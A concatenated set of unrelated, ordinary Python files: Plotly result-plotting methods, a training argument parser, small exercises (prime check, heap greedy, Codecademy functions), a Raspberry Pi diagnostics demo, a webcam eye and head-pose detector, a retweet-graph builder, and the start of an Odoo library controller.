            "indigo",
            "olive",
            "darkred",
        ]

    @classmethod
    def matplotlib_to_plotly(cls, cmap, res: int):
        """
        Convert matplotlib color scale to plotly color scale.

        :param cmap: matplotlib color scale function
        :param res: resolution to use
        :return: list of string use by plotly
        """
        h = 1.0 / (res - 1)
        pl_colorscale = []
        for k in range(res):
            C = (np.array(cmap(k * h)[:3]) * 255).astype(np.uint8)
            pl_colorscale.append([k * h, "rgb" + str((C[0], C[1], C[2]))])
        return pl_colorscale

    def timeline(self, df: pd.DataFrame, title: str):
        """Plot every scenario as a semi-transparent line over time."""
        scenarios = df.index.get_level_values("scn").unique()
        # More scenarios -> more transparency, floored at 0.01.
        alpha = max(0.01, 1 / scenarios.size)
        color = "rgba(0, 0, 0, %.2f)" % alpha

        fig = go.Figure()
        for scn in scenarios:
            fig.add_trace(
                go.Scatter(
                    x=self.time_index,
                    y=df.loc[scn],
                    mode="lines",
                    hoverinfo="name",
                    name="scn %0d" % scn,
                    line=dict(color=color),
                )
            )
        fig.update_layout(
            title_text=title,
            yaxis_title="Quantity %s" % self.unit,
            xaxis_title="time",
            showlegend=False,
        )
        return fig

    def monotone(self, y: np.ndarray, title: str):
        """Plot the monotone (load-duration style) curve of y, sorted
        descending against a 0-100% x axis. Note: sorts y in place."""
        y.sort()
        y = y[::-1]
        x = np.linspace(0, 100, y.size)

        fig = go.Figure()
        fig.add_trace(go.Scatter(x=x, y=y, mode="markers"))
        fig.update_layout(
            title_text=title,
            yaxis_title="Quantity %s" % self.unit,
            xaxis_title="%",
            showlegend=False,
        )
        return fig

    def gaussian(self, rac: np.ndarray, qt: np.ndarray, title: str):
        """Plot quantities on a gaussian fitted to qt; points with rac >= 0
        are marked green ("passed"), others red ("failed")."""
        #                1             /  x - m \ 2
        #            --------- * exp -0.5 * | -------- |
        #            o * √2*Pi         \    o   /
        def _gaussian(x, m, o):
            # 1.772454 approximates sqrt(pi); see formula above.
            return np.exp(-0.5 * np.power((x - m) / o, 2)) / o / 1.772454

        x = np.linspace(np.min(qt) * 0, np.max(qt) * 1.2, 100)
        m = np.mean(qt)
        o = np.std(qt)
        green = qt[rac >= 0]
        red = qt[rac < 0]

        fig = go.Figure()
        fig.add_trace(
            go.Scatter(
                x=x,
                y=_gaussian(x, m, o),
                mode="lines",
                hoverinfo="none",
                line=dict(color="grey"),
            )
        )
        fig.add_trace(
            go.Scatter(
                x=green,
                y=_gaussian(green, m, o),
                hovertemplate="%{x:.2f} " + self.unit,
                name="passed",
                mode="markers",
                marker=dict(color="green", size=10),
            )
        )
        fig.add_trace(
            go.Scatter(
                x=red,
                y=_gaussian(red, m, o),
                hovertemplate="%{x:.2f} " + self.unit,
                name="failed",
                mode="markers",
                marker=dict(color="red", size=10),
            )
        )
        fig.update_layout(
            title_text=title,
            yaxis=dict(visible=False),
            yaxis_title="",
            xaxis_title="Quantity %s" % self.unit,
            showlegend=False,
        )
        return fig

    def candles(self, open: np.ndarray, close: np.ndarray, title: str):
        """Plot begin/end quantities per timestep as OHLC candles, with the
        flow (close - open) in the hover text."""
        fig = go.Figure()
        text = [
            "%s<br>Begin=%d<br>End=%d<br>Flow=%d" % (t, o, c, c - o)
            for o, c, t in zip(open, close, self.time_index)
        ]
        fig.add_trace(
            go.Ohlc(
                x=self.time_index,
                open=open,
                high=open,
                low=close,
                close=close,
                hoverinfo="text",
                text=text,
            )
        )
        fig.update_layout(
            title_text=title,
            yaxis_title="Quantity %s" % self.unit,
            xaxis_rangeslider_visible=False,
            xaxis_title="Time",
            showlegend=False,
        )
        return fig

    def stack(
        self,
        areas: List[Tuple[str, np.ndarray]],
        lines: List[Tuple[str, np.ndarray]],
        title: str,
    ):
        """Plot cumulative stacked areas plus cumulative stacked lines."""
        fig = go.Figure()

        # Stack areas
        stack = np.zeros_like(self.time_index, dtype=float)
        for i, (name, data) in enumerate(areas):
            stack += data
            fig.add_trace(
                go.Scatter(
                    x=self.time_index,
                    y=stack.copy(),
                    name=name,
                    mode="none",
                    fill="tozeroy" if i == 0 else "tonexty",
                )
            )

        # Stack lines.
        # Bottom line have to be top frontward. So we firstly stack lines then plot in reverse set.
        stack = np.zeros_like(self.time_index, dtype=float)
        stacked_lines = []
        for i, (name, data) in enumerate(lines):
            stack += data
            stacked_lines.append((name, stack.copy()))
        for i, (name, data) in enumerate(stacked_lines[::-1]):
            fig.add_trace(
                go.Scatter(
                    x=self.time_index,
                    y=data,
                    line_color=self.cmap_cons[i % 10],
                    name=name,
                    line=dict(width=2),
                )
            )
        fig.update_layout(
            title_text=title, yaxis_title="Quantity %s" % self.unit, xaxis_title="time"
        )
        return fig

    def matrix(self, data: np.ndarray, title):
        """Heatmap of scenarios x time; raw values shown on hover, colors
        scaled so positives and negatives each normalize to [-1, 1]."""
        def sdt(x):
            # Normalize positives by max and negatives by |min| separately.
            x[x > 0] /= np.max(x[x > 0])
            x[x < 0] /= -np.min(x[x < 0])
            return x

        fig = go.Figure(
            data=go.Heatmap(
                z=sdt(data.copy()),
                x=self.time_index,
                y=np.arange(data.shape[0]),
                hoverinfo="text",
                text=data,
                colorscale="RdBu",
                zmid=0,
                showscale=False,
            )
        )
        fig.update_layout(
            title_text=title,
            yaxis_title="scenarios",
            xaxis_title="time",
            showlegend=False,
        )
        return fig

    def map_exchange(self, nodes, lines, limit, title, size):
        """Plot node net positions and inter-node flows on a map.

        Requires node coordinates (see constructor); raises ValueError
        otherwise.
        """
        if self.coord is None:
            raise ValueError(
                "Please provide node coordinate by setting param node_coord in Plotting constructor"
            )
        fig = go.Figure()

        # Add node circle
        keys = nodes.keys()
        node_qt = [nodes[k] for k in keys]
        node_coords = np.array([self.coord[n] for n in keys])
        # Map center: mean of node coordinates.
        center = np.mean(node_coords, axis=0)

        # Plot arrows
        for (src, dest), qt in lines.items():
            # Map |qt| into the upper half of the colormap.
            color = "rgb" + str(self.cmap(abs(qt) / 2 / limit + 0.5)[:-1])
            self._plot_links(fig, src, dest, color, qt, size)

        # Plot nodes
        fig.add_trace(
            go.Scattermapbox(
                mode="markers",
                lon=node_coords[:, 0],
                lat=node_coords[:, 1],
                hoverinfo="text",
                text=node_qt,
                marker=dict(
                    size=20,
                    colorscale=self.cmap_plotly,
                    cmin=-limit,
                    color=node_qt,
                    cmax=limit,
                    colorbar_title="Net Position %s" % self.unit,
                ),
            )
        )
        fig.update_layout(
            showlegend=False,
            title_text=title,
            mapbox=dict(
                style="carto-positron",
                center={"lon": center[0], "lat": center[1]},
                zoom=1 / size / 0.07,
            ),
        )
        return fig

    def _plot_links(
        self, fig: go.Figure, start: str, end: str, color: str, qt: float, size: float
    ):
        """
        Plot line with arrow to a figure.

        :param fig: figure to use
        :param start: start node
        :param end: end node
        :param color: color to use
        :param qt: quantity to set inside label
        :param size: line width scale factor
        :return:
        """
        S = np.array([self.coord[start][0], self.coord[start][1]])
        E = np.array([self.coord[end][0], self.coord[end][1]])

        # plot line
        fig.add_trace(
            go.Scattermapbox(
                lat=[S[1], E[1]],
                hoverinfo="skip",
                lon=[S[0], E[0]],
                mode="lines",
                line=dict(width=2 * size, color=color),
            )
        )
        # vector flow direction
        v = E - S
        n = np.linalg.norm(v)
        # Get orthogonal vector
        w = np.array([v[1], -v[0]])
        # Compute triangle points
        A = E - v * 0.1
        B = A - v / 10 - w / 10
        C = A - v / 10 + w / 10
        # plot arrow
        fig.add_trace(
            go.Scattermapbox(
                lat=[B[1], A[1], C[1], B[1], None],
                hoverinfo="text",
                fill="toself",
                lon=[B[0], A[0], C[0], B[0], None],
                text=str(qt),
                mode="lines",
                line=dict(width=2 * size, color=color),
            )
        )
class HTMLPlotting(ABCPlotting):
    """
    Plotting implementation interactive html graphics. (Use plotly)
    """

    def __init__(
        self,
        agg: ResultAnalyzer,
        unit_symbol: str = "",
        time_start=None,
        time_end=None,
        node_coord: Dict[str, List[float]] = None,
    ):
        """
        Create instance.

        :param agg: ResultAnalyzer instance to use
        :param unit_symbol: symbol on quantity unit used. ex. MW, litter, Go, ...
        :param time_start: time to use as the start of study horizon
        :param time_end: time to use as the end of study horizon
        :param node_coord: nodes coordinates to use for map plotting
        """
        ABCPlotting.__init__(self, agg, unit_symbol, time_start, time_end, node_coord)
        # Delegate element-level figure construction to the HTML implementation.
        self.plotting = HTMLElementPlotting(self.unit, self.time_index, self.coord)
|
import argparse

# Command-line options for the training pipeline; `args` is consumed by the
# importing training script.
parser = argparse.ArgumentParser(description='Parser for all the training options')

# General options
parser.add_argument('-shuffle', action='store_true', help='Reshuffle data at each epoch')
parser.add_argument('-small_set', action='store_true', help='Whether uses a small dataset')
# NOTE(review): help text says "Path to save train record" but this is a
# boolean flag — confirm the intended semantics.
parser.add_argument('-train_record', action='store_true', help='Path to save train record')
parser.add_argument('-test_only', action='store_true', help='Only conduct test on the validation set')
parser.add_argument('-ckpt', default=0, type=int, help='Choose the checkpoint to run')
parser.add_argument('-model', required=True, help='Model type when we create a new one')
parser.add_argument('-data_dir', required=True, help='Path to data directory')
parser.add_argument('-train_list', required=True, help='Path to data directory')
parser.add_argument('-test_list', required=True, help='Path to data directory')
parser.add_argument('-save_path', required=True, help='Path to save train record')
parser.add_argument('-output_classes', required=True, type=int, help='Num of color classes')

# Training options
parser.add_argument('-learn_rate', default=1e-2, type=float, help='Base learning rate of training')
parser.add_argument('-momentum', default=0.9, type=float, help='Momentum for training')
parser.add_argument('-weight_decay', default=5e-4, type=float, help='Weight decay for training')
parser.add_argument('-n_epochs', default=20, type=int, help='Training epochs')
parser.add_argument('-batch_size', default=64, type=int, help='Size of mini-batches for each iteration')
parser.add_argument('-criterion', default='CrossEntropy', help='Type of objective function')

# Model options
parser.add_argument('-pretrained', default=None, help='Path to the pretrained model')
parser.add_argument('-resume', action='store_true', help='Whether continue to train from a previous checkpoint')
parser.add_argument('-nGPU', default=4, type=int, help='Number of GPUs for training')
parser.add_argument('-workers', default=8, type=int, help='Number of subprocesses to to load data')
parser.add_argument('-decay', default=8, type=int, help='LR decay')
parser.add_argument('-size', default=224, type=int)
parser.add_argument('-cutout', action='store_true', default=False, help='apply cutout')
parser.add_argument('-n_holes', type=int, default=1, help='number of holes to cut out from image')
parser.add_argument('-length', type=int, default=8,
                    help='length of the holes')

# disturb label options
# NOTE(review): default=False without action='store_true' means any supplied
# string value (even "False") is truthy — confirm intended usage.
parser.add_argument('-enable_disturb_label', default=False, help='Whether disturb label')
parser.add_argument('-noise_rate', default=0.1, type=float, help='noise rate for disturbing labels')
parser.add_argument('-mixup', action='store_true', default=False, help='apply mixup')
parser.add_argument('-save_result', action='store_true', default=False, help='save result when evaluating')
args = parser.parse_args()
|
from rif_cpp.numeric.pigen import *
|
# Algorithm that reports whether a user-supplied number is prime.
def asal_mi(n):
    """Return True if n is a prime number, False otherwise.

    BUG FIX: the original reported n=1 (and any n < 2) as prime because the
    trial-division loop never ran for small n; primes are defined as >= 2.
    """
    if n < 2:
        return False
    if n == 2:
        return True
    if n % 2 == 0:
        return False
    # Trial division by odd candidates up to sqrt(n); even divisors are
    # already excluded above, and we can stop at the first divisor found.
    i = 3
    while i <= n ** 0.5:
        if n % i == 0:
            return False
        i += 2
    return True


if __name__ == '__main__':
    n = int(input("bir sayı giriniz: "))
    if asal_mi(n):
        print("asal sayıdır")
    else:
        print("asal sayı değildir")
|
import sys
import time
# --- Simulated raw sensor inputs (millivolts) for the demo controller ---
spindle_current = 490
vacuum_table_current = 1234
air_quality_sensor = 2345
waste_sensor = 3453
# --- Derived output/state flags driven off the sensor values ---
dust_collector_power = True
air_quality_bad = False
waste_bin_full = True
spindle_warmed_up = True
# ASCII wiring diagram; the eight {} slots are filled by display_diagnostics()
# in the order: four inputs (top), then four outputs (bottom).
diagnostics_template = """
+-------< spindle_current = {}mv
| +-----< vacuum_table_current = {}mv
| | +---< air_quality_sensor = {}mv
| | | +-< waste_sensor = {}mv
| | | |
+-+-+-+-+-+
| RasPi |
+-+-+-+-+-+
| | | |
| | | +-> dust_collector_power = {}
| | +---> air_quality_bad = {}
| +-----> waste_bin_full = {}
+-------> spindle_warmed_up = {}
"""
def multiply(a, b):
    """Return the product of a and b."""
    product = a * b
    return product
def clear_screen():
    """Clear the terminal via ANSI escapes (2J = clear screen, H = cursor home)."""
    sys.stdout.write("\x1b[2J\x1b[H")
def update_inputs():
    """Advance the simulated sensor inputs by one tick.

    Only the spindle current is simulated: it ramps up by 1 mV per call.
    """
    global spindle_current
    spindle_current += 1
def event_loop():
    """Main control loop: poll inputs, update outputs, redraw the diagram.

    Runs forever at one iteration per second; stop with Ctrl-C.
    """
    while True:
        update_inputs()
        update_dustcollector_power()
        clear_screen()
        display_diagnostics()
        time.sleep(1.0) # pause for one second
def update_dustcollector_power():
    """Switch the dust collector on exactly when the spindle draws > 500 mV."""
    global dust_collector_power
    dust_collector_power = spindle_current > 500
def display_diagnostics():
    """Print the wiring diagram filled with the current input/output values.

    BUG FIX: the bare `print expr` statement was Python-2-only syntax; the
    parenthesized call form below is valid on both Python 2 and Python 3.
    """
    print(diagnostics_template.format(
        spindle_current,
        vacuum_table_current,
        air_quality_sensor,
        waste_sensor,
        dust_collector_power,
        air_quality_bad,
        waste_bin_full,
        spindle_warmed_up,
    ))
if __name__ == '__main__':
    # Start the (infinite) diagnostics loop only when run as a script.
    event_loop()
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from afriventapp.models import UserProfile
# def user_post_save(sender, **kwargs):
# if kwargs['created']:
# user_profile = UserProfile.objects.create(user=kwargs['instance'])
# post_save.connect(user_post_save, sender=User) |
#!/usr/bin/env python
"""
_ChangeState_
Sqlite implementation of Destroy for ThreadPool
"""
__all__ = []
from WMCore.Database.DBFormatter import DBFormatter
from WMCore.ThreadPool.MySQL.Destroy import Destroy as BaseDAO
class Destroy(BaseDAO):
    """SQLite variant of the ThreadPool Destroy DAO.

    Inherits the MySQL Destroy behaviour and overrides one DROP statement.
    """
    def __init__(self):
        BaseDAO.__init__(self)
        # NOTE(review): the key says "04tp_queued_process" but the statement
        # drops "tp_queued_process_enum" — confirm the table name is intended
        # (SQLite may model the enum as a separate table).
        self.delete["04tp_queued_process"] = "DROP TABLE tp_queued_process_enum"
|
import heapq


def min_total_cost(K, H):
    """Perform K greedy picks on a heap of (cost, increment) pairs.

    Each round pops the pair with the smallest cost `a`, adds `a` to the
    running total, and pushes the pair back with cost `a + b`.  Returns the
    total.  The input list is not mutated (the original heapified in place).
    """
    heap = list(H)
    heapq.heapify(heap)  # turn the list into a min-heap
    total = 0
    for _ in range(K):
        a, b = heapq.heappop(heap)  # cheapest pair
        total += a
        heapq.heappush(heap, (a + b, b))  # re-insert with increased cost
    return total


if __name__ == '__main__':
    N, K = map(int, input().split())
    H = [tuple(map(int, input().split())) for _ in range(N)]
    print(min_total_cost(K, H))
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import cv2
import dlib
import numpy
from scipy.spatial import distance as dist
from imutils import face_utils
# define two constants, one for the eye aspect ratio to indicate
# blink and then a second constant for the number of consecutive
# frames the eye must be below the threshold
EYE_AR_THRESH = 0.27
EYE_AR_CONSEC_FRAMES = 2
# consecutive-frame count and mouth-opening ratio used for yawn detection
MOUTH_YA_CONSEC_FRAMES=9
MOUTH_YAWNING_THRESH=0.7
# dlib 68-point facial landmark model (must be present in the working dir)
DAT_FILENAME = 'shape_predictor_68_face_landmarks.dat'
# grab the indexes of the facial landmarks for the left and
# right eye (and mouth), respectively
(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
(mStart,mEnd) = face_utils.FACIAL_LANDMARKS_IDXS["mouth"]
def eye_aspect_ratio(eye):
    """Compute the eye aspect ratio (EAR) from six eye landmarks.

    EAR = (|p1-p5| + |p2-p4|) / (2 * |p0-p3|): the two vertical landmark
    distances over twice the horizontal distance.  Small values mean the
    eye is (nearly) closed.
    """
    vertical_a = dist.euclidean(eye[1], eye[5])
    vertical_b = dist.euclidean(eye[2], eye[4])
    horizontal = dist.euclidean(eye[0], eye[3])
    return (vertical_a + vertical_b) / (2.0 * horizontal)
def detect_yanwing(mouth):
    """Return the mouth-opening ("yawning") ratio from 12 mouth landmarks.

    Sum of three vertical lip distances divided by the sum of three
    horizontal distances; larger values mean a wider-open mouth.
    """
    vertical = sum(dist.euclidean(mouth[i], mouth[j])
                   for i, j in ((2, 10), (3, 9), (4, 8)))
    horizontal = sum(dist.euclidean(mouth[i], mouth[j])
                     for i, j in ((0, 6), (1, 5), (11, 7)))
    return vertical / horizontal
def showPose(im, image_points):
    """Estimate head pose from six 2D landmarks, annotate `im`, and return
    (annotated image, pixel length of the projected "nose ray").

    The pixel length is used by the caller as a rough looking-away measure.
    """
    # 3D model points.
    model_points = numpy.array([
        (0.0, 0.0, 0.0),             # Nose tip
        (0.0, -330.0, -65.0),        # Chin
        (-225.0, 170.0, -135.0),     # Left eye left corner
        (225.0, 170.0, -135.0),      # Right eye right corne
        (-150.0, -150.0, -125.0),    # Left Mouth corner
        (150.0, -150.0, -125.0)      # Right mouth corner
    ])
    # Camera internals (pinhole approximation: focal length = image width,
    # principal point = image centre)
    size=im.shape
    focal_length = size[1]
    center = (size[1]/2, size[0]/2)
    camera_matrix = numpy.array(
        [[focal_length, 0, center[0]],
         [0, focal_length, center[1]],
         [0, 0, 1]], dtype = "double"
    )
    #print ("Camera Matrix :",camera_matrix)
    dist_coeffs = numpy.zeros((4,1)) # Assuming no lens distortion
    (success, rotation_vector, translation_vector) = cv2.solvePnP(model_points, image_points, camera_matrix, dist_coeffs, flags=cv2.SOLVEPNP_ITERATIVE)
    # Project the 3D point (0, 250, 800) onto the image plane.
    # We use this to draw a line sticking out of the nose
    (nose_end_point2D, jacobian) = cv2.projectPoints(numpy.array([(0.0, 250, 800.0)]), rotation_vector, translation_vector, camera_matrix, dist_coeffs)
    # Mark each input landmark with a filled red circle
    for p in image_points:
        cv2.circle(im, (int(p[0]), int(p[1])), 3, (0,0,255), -1)
    p1 = ( int(image_points[0][0]), int(image_points[0][1]))
    p2 = ( int(nose_end_point2D[0][0][0]), int(nose_end_point2D[0][0][1]))
    # Pixel distance between nose tip and projected ray end
    distance=dist.euclidean(p1,p2)
    cv2.line(im, p1, p2, (255,0,0), 2)
    return im ,distance
def process_frame(detector,predictor,gray_frame):
    """Run face/landmark detection on one frame and show an annotated window.

    Returns (eyes_open, looking_forward).
    NOTE(review): the frame is named `gray_frame` but the caller passes the
    raw capture frame, and drawing happens directly on it — confirm intended.
    """
    eyes_open = True
    looking_forward = True
    distance=0
    frame = []
    # detect faces in the grayscale frame
    rects = detector(gray_frame, 0)
    #print(rects)
    # We now need to loop over each of the faces in the frame and
    # then apply facial landmark detection to each of them
    if len(rects) > 0:
        for rect in rects:
            # determine the facial landmarks for the face region, then
            # convert the facial landmark (x, y)-coordinates to a NumPy
            # array
            shape = predictor(gray_frame, rect)
            shape = face_utils.shape_to_np(shape)
            # Six landmarks matching showPose's 3D model points
            image_points=numpy.array([
                shape[30], # Nose tip
                shape[8], # Chin
                shape[45], # Left eye left corner
                shape[36], # Right eye right corne
                shape[54], # Left Mouth corner
                shape[48] # Right mouth corner
            ], dtype='double')
            frame, distance=showPose(gray_frame, image_points)
            # extract the left and right eye coordinates, then use the
            # coordinates to compute the eye aspect ratio for both eyes
            leftEye = shape[lStart:lEnd]
            rightEye = shape[rStart:rEnd]
            mouth=shape[mStart:mEnd]
            leftEAR = eye_aspect_ratio(leftEye)
            rightEAR = eye_aspect_ratio(rightEye)
            yawningRatio=detect_yanwing(mouth)
            # average the eye aspect ratio together for both eyes
            ear = (leftEAR + rightEAR) / 2.0
            # compute the convex hull for the left and right eye, then
            # visualize each of the eyes
            leftEyeHull = cv2.convexHull(leftEye)
            rightEyeHull = cv2.convexHull(rightEye)
            mouthHull=cv2.convexHull(mouth)
            cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)
            cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)
            cv2.drawContours(frame,[mouthHull],-1,(0,255,0),1)
            # check to see if the eye aspect ratio is below the blink
            # threshold, and if so, increment the blink frame ounter
            # @TODO
            # if yawningRatio>MOUTH_YAWNING_THRESH:
            #     mouthCounter+=1
            # else:
            #     mouthCounter=0
            # if mouthCounter>=MOUTH_YA_CONSEC_FRAMES:
            #     totalYawn+=1
            #     mouthCounter=0
            # if lower, eyes are closed
            if ear < EYE_AR_THRESH:
                eyes_open = False
            # # otherwise, the eye aspect ratio is not below the blink
            # # threshold
            # else:
            #     # if the eyes were closed for a sufficient number of
            #     # then increment the total number of blinks
            #     if COUNTER >= EYE_AR_CONSEC_FRAMES:
            #         TOTAL += 1
            #     # reset the eye frame counter
            #     COUNTER = 0
    # draw the total number of blinks on the frame along with
    # the computed eye aspect ratio for the frame
    # if no rects, then looking away
    print(distance)
    # 200 px of nose-ray length is the empirical "looking away" cutoff
    if len(rects) > 0:
        if distance < 200:
            looking_forward = True
        else:
            looking_forward = False
    else:
        looking_forward = False
    if len(frame) > 0:
        cv2.putText(frame, "eyes open: {}".format(eyes_open), (10, 30),
                    cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
        cv2.putText(frame, "EAR: {:.2f}".format(ear), (300, 30),
                    cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
        # NOTE(review): yawning count is hard-coded to 3 in the overlay;
        # the yawn-counting logic above is still commented out.
        cv2.putText(frame,"yawning:{}".format(3),(10,60),
                    cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
        cv2.putText(frame, "looking ahead?: {}".format(looking_forward), (300, 60),
                    cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)
        #show the frame
        cv2.imshow("Frame", frame)
        key = cv2.waitKey(1) & 0xFF
    return (eyes_open, looking_forward)
# Open the default webcam at 640x480 and run detection frame by frame.
vc = cv2.VideoCapture(0)
vc.set(3,640)  # property 3 = frame width
vc.set(4,480)  # property 4 = frame height
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(DAT_FILENAME)
# NOTE(review): `ret` is never checked, there is no exit condition, and the
# capture is never released — confirm this is acceptable for the demo.
while True:
    ret, frame = vc.read()
    eyes_open,looking_forward=process_frame(detector,predictor,frame)
|
emails = ['me@hotmail.com','you@gmail.com','they@gmail.com']
# Print only the Gmail addresses.
gmail_addresses = (address for address in emails if 'gmail' in address)
for address in gmail_addresses:
    print(address)
|
import sys
import json
import networkx as nx
def readInput(fp):
    """Read a JSON-lines file and return a list of the parsed objects.

    BUG FIX: the original iterated `open(fp, ...)` without ever closing the
    handle; the context manager guarantees closure even if a line fails to
    parse.
    """
    data = []
    with open(fp, 'r', encoding='utf-8') as infile:
        for line in infile:
            data.append(json.loads(line))
    return data
def writeOutput(fp, data):
    """Serialize `data` as JSON into the file at `fp` (UTF-8)."""
    with open(fp, 'w', encoding='utf-8') as handle:
        handle.write(json.dumps(data))
if __name__ == '__main__':
    # CLI: <tweets.jsonl> <graph.gexf> <summary.json>
    input_file = sys.argv[1]
    gexf_output_file = sys.argv[2]
    json_output_file = sys.argv[3]
    # input_file = './Gamergate.json'
    # input_file = './toy_test/mini_mid_gamergate.json'
    # gexf_output_file = './gext_testout1.gexf'
    # json_output_file = './json_testout1.json'
    tweets = readInput(input_file)
    # Build a directed retweet graph: retweeter -> original author,
    # with edge weight = number of retweets between the pair.
    G = nx.DiGraph()
    for tweet in tweets:
        if 'retweeted_status' not in tweet:
            G.add_node(tweet['user']['screen_name'])
        else:
            if G.has_edge(tweet['user']['screen_name'], tweet['retweeted_status']['user']['screen_name']):
                G[tweet['user']['screen_name']][tweet['retweeted_status']['user']['screen_name']]['weight'] += 1
            else:
                G.add_edge(tweet['user']['screen_name'], tweet['retweeted_status']['user']['screen_name'], weight = 1)
    nx.write_gexf(G, gexf_output_file)
    n_nodes, n_edges = G.number_of_nodes(), G.number_of_edges()
    # Most-retweeted user = largest weighted in-degree;
    # busiest retweeter = largest weighted out-degree.
    # NOTE(review): retweeted_list[0] raises IndexError on an empty graph —
    # confirm inputs are always non-empty.
    retweeted_list = sorted([(user, weight) for user, weight in G.in_degree(weight='weight')], key=lambda x: x[1], reverse=True)
    max_retweeted_user = retweeted_list[0][0]
    max_retweeted_number = retweeted_list[0][1]
    retweeter_list = sorted([(user, weight) for user, weight in G.out_degree(weight='weight')], key=lambda x: x[1], reverse=True)
    max_retweeter_user = retweeter_list[0][0]
    max_retweeter_number = retweeter_list[0][1]
    res = {}
    res['n_nodes'] = n_nodes
    res['n_edges'] = n_edges
    res['max_retweeted_user'] = max_retweeted_user
    res['max_retweeted_number'] = max_retweeted_number
    res['max_retweeter_user'] = max_retweeter_user
    res['max_retweeter_number'] = max_retweeter_number
    writeOutput(json_output_file, res)
# INTRODUCTION TO FUNCTIONS
# Four users request the same route, so the same three messages are printed
# four times (motivating the function definitions below).
for _ in range(4):
    print("Setting the Empire State Building as the starting point and Time Square as our destination.")
    print("Calculating the total distance between our points.")
    print("The best route is by train and will take approximately 10 minutes.")
# Defining a Function
def directions_to_timesSq():
    """Print subway directions from Herald Square to Times Square."""
    steps = (
        "Walk 4 mins to 34th St Herald Square train station",
        "Take the Northbound N, Q, R, or W train 1 stop",
        "Get off the Times Square 42nd Street stop",
    )
    for step in steps:
        print(step)
# Calling a Function
def directions_to_timesSq():
    """Print subway directions from Herald Square to Times Square (v2)."""
    steps = (
        "Walk 4 mins to 34th St Herald Square train station.",
        "Take the Northbound N, Q, R, or W train 1 stop.",
        "Get off the Times Square 42nd Street stop.",
        "Take lots of pictures!",
    )
    for step in steps:
        print(step)

directions_to_timesSq()
# Whitespace & Execution Flow
# Write your code below!
print("Checking the weather for you!")
def weather_check():
    """Report the weather (which changes mid-report)."""
    for line in (
        "Looks great outside! Enjoy your trip.",
        "False Alarm, the weather changed! There is a thunderstorm approaching. Cancel your plans and stay inside.",
    ):
        print(line)
weather_check()
# Parameters & Arguments
# Checkpoint 1 & 2
def generate_trip_instructions(location):
    """Print travel hints for the given destination."""
    for line in (
        "Looks like you are planning a trip to visit " + location,
        "You can use the public subway system to get to " + location,
    ):
        print(line)
# Checkpoint 3 & 4
#generate_trip_instructions("Central Park")
generate_trip_instructions("Grand Central Station")
# Multiple Parameters
def calculate_expenses(plane_ticket_price, car_rental_rate, hotel_rate , trip_time):
    """Print the total trip cost: flight + rental + hotel (with a flat $10 off)."""
    rental_cost = car_rental_rate * trip_time
    hotel_cost = hotel_rate * trip_time - 10
    total_cost = rental_cost + hotel_cost + plane_ticket_price
    print(total_cost)
calculate_expenses(200, 100, 100, 5)
# Types of Arguments
def trip_planner(first_destination, second_destination, final_destination="Codecademy HQ"):
    """Print a three-stop itinerary; the last stop defaults to Codecademy HQ."""
    itinerary = ("First, we will stop in " + first_destination + ", then " +
                 second_destination + ", and lastly " + final_destination)
    print("Here is what your trip will look like!")
    print(itinerary)
trip_planner("France", "Germany", "Denmark")
trip_planner("Denmark", "France", "Germany")
trip_planner(first_destination="Iceland", final_destination="Germany", second_destination="India")
trip_planner("Brooklyn", "Queens")
# Built-in Functions vs User Defined Functions
tshirt_price = 9.75
shorts_price = 15.50
mug_price = 5.99
poster_price = 2.00
# Write your code below:
max_price = max(9.75, 15.50, 5.99, 2.00)
print(max_price)
min_price = min(9.75, 15.50, 5.99, 2.00)
print(min_price)
rounded_price = round(tshirt_price, 1)
print(rounded_price)
# Variable Access
favorite_locations = "Paris, Norway, Iceland"
# This function will print a hardcoded count of how many locations we have.
def print_count_locations():
    print("There are 3 locations")
# This function will print the favorite locations
def show_favorite_locations():
    # Reads the module-level (global) string defined above.
    print("Your favorite locations are: " + favorite_locations)
print_count_locations()
show_favorite_locations()
# Returns
current_budget = 3500.75
def print_remaining_budget(budget):
    """Display the remaining budget in dollars."""
    message = "Your remaining budget is: $" + str(budget)
    print(message)
print_remaining_budget(current_budget)
# Write your code below:
def deduct_expense(budget, expense):
    """Return the budget left after paying `expense`."""
    remaining = budget - expense
    return remaining
shirt_expense = 9
new_budget_after_shirt = deduct_expense(current_budget, shirt_expense)
print_remaining_budget(new_budget_after_shirt)
# Multiple Returns
def top_tourist_locations_italy():
    """Return Italy's three most-visited cities, most popular first."""
    return "Rome", "Venice", "Florence"
most_popular1, most_popular2, most_popular3 = top_tourist_locations_italy()
for city in (most_popular1, most_popular2, most_popular3):
    print(city)
# Review
def trip_planner_welcome(name):
    """Greet the user by name."""
    greeting = "Welcome to tripplanner v1.0 " + name
    print(greeting)
def destination_setup(origin, destination, estimated_time, mode_of_transport="Car"):
    """Print a trip summary; transport defaults to Car."""
    for line in (
        "Your trip starts off in " + origin,
        "And you are traveling to " + destination,
        "You will be traveling by " + mode_of_transport,
        "It will take approximately " + str(estimated_time) + " hours",
    ):
        print(line)
def estimated_time_rounded(estimated_time):
    """Round the estimate to a whole number of hours (Python's round())."""
    return round(estimated_time)
# trip_planner_welcome(" <YOUR NAME HERE> ")
# estimate = estimated_time_rounded(2.43)
# destination_setup(" <PICK A ORIGIN> ", "<PICK A DESTINATION > ", estimate, "Car")
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import http
from odoo.http import request
from odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT
from datetime import date
class LibraryController(http.Controller):
    """JSON endpoints backing the library dashboard."""
    @http.route('/library/statistics', type='json', auth='user')
    def library_statistics(self):
        """Return this month's rental/payment figures plus book-state counts.

        NOTE(review): date.today() values are formatted with the DATETIME
        format and last_day is "today", so records later today may fall
        outside the range depending on the field types — confirm.
        """
        Book = request.env['product.product']
        Payment = request.env['library.payment']
